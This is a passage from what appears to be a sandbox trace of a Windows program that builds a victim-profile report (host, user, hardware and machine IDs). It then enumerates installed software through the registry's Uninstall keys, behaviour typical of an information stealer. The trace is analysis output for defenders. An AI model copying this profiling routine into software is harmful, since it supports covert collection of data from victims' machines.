Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: " [0235.115] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: ", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \n" [0235.115] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fb4 | out: phkResult=0x197fb4*=0x388) returned 0x0 [0235.115] RegEnumKeyExA (in: hKey=0x388, dwIndex=0x0, lpName=0x1983bc, lpcchName=0x197fac, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="AddressBook", lpcchName=0x197fac, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0235.115] wsprintfA (in: param_1=0x197fbc, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\AddressBook") returned 63 [0235.115] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\AddressBook", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fb8 | out: phkResult=0x197fb8*=0x384) returned 0x0 [0235.115] RegQueryValueExA (in: hKey=0x384, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987c0, lpData=0x197bac, lpcbData=0x197fac*=0x400 | out: lpType=0x1987c0*=0x0, lpData=0x197bac*=0x4, lpcbData=0x197fac*=0x400) returned 0x2 [0235.116] RegCloseKey (hKey=0x384) returned 0x0 [0235.116] RegEnumKeyExA (in: hKey=0x388, dwIndex=0x1, lpName=0x1983bc, lpcchName=0x197fac, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Connection Manager", lpcchName=0x197fac, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0235.116] wsprintfA (in: param_1=0x197fbc, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Connection Manager") returned 70 [0235.116] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Connection Manager", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fb8 | out: phkResult=0x197fb8*=0x384) returned 0x0 [0235.116] RegQueryValueExA (in: hKey=0x384, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987c0, lpData=0x197bac, lpcbData=0x197fac*=0x400 | out: lpType=0x1987c0*=0x0, lpData=0x197bac*=0x4, lpcbData=0x197fac*=0x400) returned 0x2 [0235.116] RegCloseKey (hKey=0x384) returned 0x0 [0235.116] RegEnumKeyExA (in: hKey=0x388, dwIndex=0x2, lpName=0x1983bc, lpcchName=0x197fac, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="DirectDrawEx", lpcchName=0x197fac, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0235.116] wsprintfA (in: param_1=0x197fbc, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\DirectDrawEx") returned 64 [0235.116] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\DirectDrawEx", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fb8 | out: phkResult=0x197fb8*=0x384) returned 0x0 [0235.116] RegQueryValueExA (in: hKey=0x384, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987c0, lpData=0x197bac, lpcbData=0x197fac*=0x400 | out: lpType=0x1987c0*=0x0, lpData=0x197bac*=0x4, lpcbData=0x197fac*=0x400) returned 0x2 [0235.116] RegCloseKey (hKey=0x384) returned 0x0 [0235.117] RegEnumKeyExA (in: hKey=0x388, dwIndex=0x3, lpName=0x1983bc, lpcchName=0x197fac, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="DXM_Runtime", lpcchName=0x197fac, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0235.117] wsprintfA (in: param_1=0x197fbc, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\DXM_Runtime") returned 63 [0235.117] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\DXM_Runtime", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fb8 | out: phkResult=0x197fb8*=0x384) returned 0x0 [0235.117] RegQueryValueExA (in: hKey=0x384, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987c0, lpData=0x197bac, lpcbData=0x197fac*=0x400 | out: lpType=0x1987c0*=0x0, lpData=0x197bac*=0x4, lpcbData=0x197fac*=0x400) returned 0x2 [0235.117] RegCloseKey (hKey=0x384) returned 0x0 [0235.117] RegEnumKeyExA (in: hKey=0x388, dwIndex=0x4, lpName=0x1983bc, lpcchName=0x197fac, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Fontcore", lpcchName=0x197fac, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0235.117] wsprintfA (in: param_1=0x197fbc, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Fontcore") returned 60 [0235.117] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Fontcore", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fb8 | out: phkResult=0x197fb8*=0x384) returned 0x0 [0235.117] RegQueryValueExA (in: hKey=0x384, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987c0, lpData=0x197bac, lpcbData=0x197fac*=0x400 | out: lpType=0x1987c0*=0x0, lpData=0x197bac*=0x4, lpcbData=0x197fac*=0x400) returned 0x2 [0235.117] RegCloseKey (hKey=0x384) returned 0x0 [0235.117] RegEnumKeyExA (in: hKey=0x388, dwIndex=0x5, lpName=0x1983bc, lpcchName=0x197fac, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IE40", lpcchName=0x197fac, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0235.117] wsprintfA (in: param_1=0x197fbc, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\IE40") returned 56 [0235.118] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\IE40", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fb8 | out: phkResult=0x197fb8*=0x384) returned 0x0 [0235.118] RegQueryValueExA (in: hKey=0x384, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987c0, lpData=0x197bac, lpcbData=0x197fac*=0x400 | out: lpType=0x1987c0*=0x0, lpData=0x197bac*=0x4, lpcbData=0x197fac*=0x400) returned 0x2 [0235.118] RegCloseKey (hKey=0x384) returned 0x0 [0235.118] RegEnumKeyExA (in: hKey=0x388, dwIndex=0x6, lpName=0x1983bc, lpcchName=0x197fac, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IE4Data", lpcchName=0x197fac, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0235.118] wsprintfA (in: param_1=0x197fbc, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\IE4Data") returned 59 [0235.118] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\IE4Data", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fb8 | out: phkResult=0x197fb8*=0x384) returned 0x0 [0235.118] RegQueryValueExA (in: hKey=0x384, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987c0, lpData=0x197bac, lpcbData=0x197fac*=0x400 | out: lpType=0x1987c0*=0x0, lpData=0x197bac*=0x4, lpcbData=0x197fac*=0x400) returned 0x2 [0235.118] RegCloseKey (hKey=0x384) returned 0x0 [0235.118] RegEnumKeyExA (in: hKey=0x388, dwIndex=0x7, lpName=0x1983bc, lpcchName=0x197fac, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IE5BAKEX", lpcchName=0x197fac, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0235.118] wsprintfA (in: param_1=0x197fbc, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\IE5BAKEX") returned 60 [0235.118] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\IE5BAKEX", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fb8 | out: phkResult=0x197fb8*=0x384) returned 0x0 [0235.119] RegQueryValueExA (in: hKey=0x384, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987c0, lpData=0x197bac, lpcbData=0x197fac*=0x400 | out: lpType=0x1987c0*=0x0, lpData=0x197bac*=0x4, lpcbData=0x197fac*=0x400) returned 0x2 [0235.119] RegCloseKey (hKey=0x384) returned 0x0 [0235.119] RegEnumKeyExA (in: hKey=0x388, dwIndex=0x8, lpName=0x1983bc, lpcchName=0x197fac, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IEData", lpcchName=0x197fac, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0235.119] wsprintfA (in: param_1=0x197fbc, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\IEData") returned 58 [0235.119] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\IEData", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fb8 | out: phkResult=0x197fb8*=0x384) returned 0x0 [0235.119] RegQueryValueExA (in: hKey=0x384, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987c0, lpData=0x197bac, lpcbData=0x197fac*=0x400 | out: lpType=0x1987c0*=0x0, lpData=0x197bac*=0x4, lpcbData=0x197fac*=0x400) returned 0x2 [0235.119] RegCloseKey (hKey=0x384) returned 0x0 [0235.119] RegEnumKeyExA (in: hKey=0x388, dwIndex=0x9, lpName=0x1983bc, lpcchName=0x197fac, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="MobileOptionPack", lpcchName=0x197fac, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0235.119] wsprintfA (in: param_1=0x197fbc, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\MobileOptionPack") returned 68 [0235.119] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\MobileOptionPack", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fb8 | out: phkResult=0x197fb8*=0x384) returned 0x0 [0235.119] RegQueryValueExA (in: hKey=0x384, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987c0, lpData=0x197bac, lpcbData=0x197fac*=0x400 | out: lpType=0x1987c0*=0x0, lpData=0x197bac*=0x4, lpcbData=0x197fac*=0x400) returned 0x2 [0235.119] RegCloseKey (hKey=0x384) returned 0x0 [0235.120] RegEnumKeyExA (in: hKey=0x388, dwIndex=0xa, lpName=0x1983bc, lpcchName=0x197fac, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="MPlayer2", lpcchName=0x197fac, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0235.120] wsprintfA (in: param_1=0x197fbc, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\MPlayer2") returned 60 [0235.120] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\MPlayer2", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fb8 | out: phkResult=0x197fb8*=0x384) returned 0x0 [0235.120] RegQueryValueExA (in: hKey=0x384, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987c0, lpData=0x197bac, lpcbData=0x197fac*=0x400 | out: lpType=0x1987c0*=0x0, lpData=0x197bac*=0x4, lpcbData=0x197fac*=0x400) returned 0x2 [0235.120] RegCloseKey (hKey=0x384) returned 0x0 [0235.120] RegEnumKeyExA (in: hKey=0x388, dwIndex=0xb, lpName=0x1983bc, lpcchName=0x197fac, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="SchedulingAgent", lpcchName=0x197fac, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0235.120] wsprintfA (in: param_1=0x197fbc, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\SchedulingAgent") returned 67 [0235.120] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\SchedulingAgent", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fb8 | out: phkResult=0x197fb8*=0x384) returned 0x0 [0235.120] RegQueryValueExA (in: hKey=0x384, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987c0, lpData=0x197bac, lpcbData=0x197fac*=0x400 | out: lpType=0x1987c0*=0x0, lpData=0x197bac*=0x4, lpcbData=0x197fac*=0x400) returned 0x2 [0235.120] RegCloseKey (hKey=0x384) returned 0x0 [0235.120] RegEnumKeyExA (in: hKey=0x388, dwIndex=0xc, lpName=0x1983bc, lpcchName=0x197fac, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WIC", lpcchName=0x197fac, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0235.120] wsprintfA (in: param_1=0x197fbc, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WIC") returned 55 [0235.120] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WIC", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fb8 | out: phkResult=0x197fb8*=0x384) returned 0x0 [0235.121] RegQueryValueExA (in: hKey=0x384, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987c0, lpData=0x197bac, lpcbData=0x197fac*=0x400 | out: lpType=0x1987c0*=0x0, lpData=0x197bac*=0x4, lpcbData=0x197fac*=0x400) returned 0x2 [0235.121] RegCloseKey (hKey=0x384) returned 0x0 [0235.121] RegEnumKeyExA (in: hKey=0x388, dwIndex=0xd, lpName=0x1983bc, lpcchName=0x197fac, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{0FA68574-690B-4B00-89AA-B28946231449}", lpcchName=0x197fac, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0235.121] wsprintfA (in: param_1=0x197fbc, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{0FA68574-690B-4B00-89AA-B28946231449}") returned 90 [0235.121] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{0FA68574-690B-4B00-89AA-B28946231449}", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fb8 | out: phkResult=0x197fb8*=0x384) returned 0x0 [0235.121] RegQueryValueExA (in: hKey=0x384, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987c0, lpData=0x197bac, lpcbData=0x197fac*=0x400 | out: lpType=0x1987c0*=0x1, lpData="Microsoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508", lpcbData=0x197fac*=0x3f) returned 0x0 [0235.121] lstrlenA (lpString="Microsoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508") returned 62 [0235.121] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \n", lpString2="Microsoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508" [0235.121] RegQueryValueExA (in: hKey=0x384, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x1987c0, lpData=0x197bac, lpcbData=0x197fac*=0x400 | out: lpType=0x1987c0*=0x1, lpData="14.25.28508", lpcbData=0x197fac*=0xc) returned 0x0 [0235.121] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 " [0235.121] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 ", lpString2="14.25.28508" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508" [0235.122] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\n" 